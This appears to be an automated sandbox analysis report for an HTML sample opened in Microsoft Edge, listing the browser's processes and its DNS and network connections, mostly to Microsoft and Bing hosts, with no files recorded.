Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\AppData\Local\Temp\8605e735f755b19186b654efc2857890_JaffaCakes118.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --mojo-platform-channel-handle=3716 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --mojo-platform-channel-handle=4620 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5364 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --mojo-platform-channel-handle=5532 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --no-appcompat-clear --mojo-platform-channel-handle=5776 --field-trial-handle=3192,i,2785050981002401924,4037047756083432660,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 23.73.139.27:443 bzib.nelreports.net tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 158.6.107.13.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:443 www.microsoft.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
GB 51.140.242.104:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 27.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 104.242.140.51.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.73.29:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 29.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
BE 88.221.83.227:443 www.bing.com tcp
US 8.8.8.8:53 227.83.221.88.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
BE 88.221.83.234:443 www.bing.com tcp
US 8.8.8.8:53 234.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 10.173.189.20.in-addr.arpa udp

Files

N/A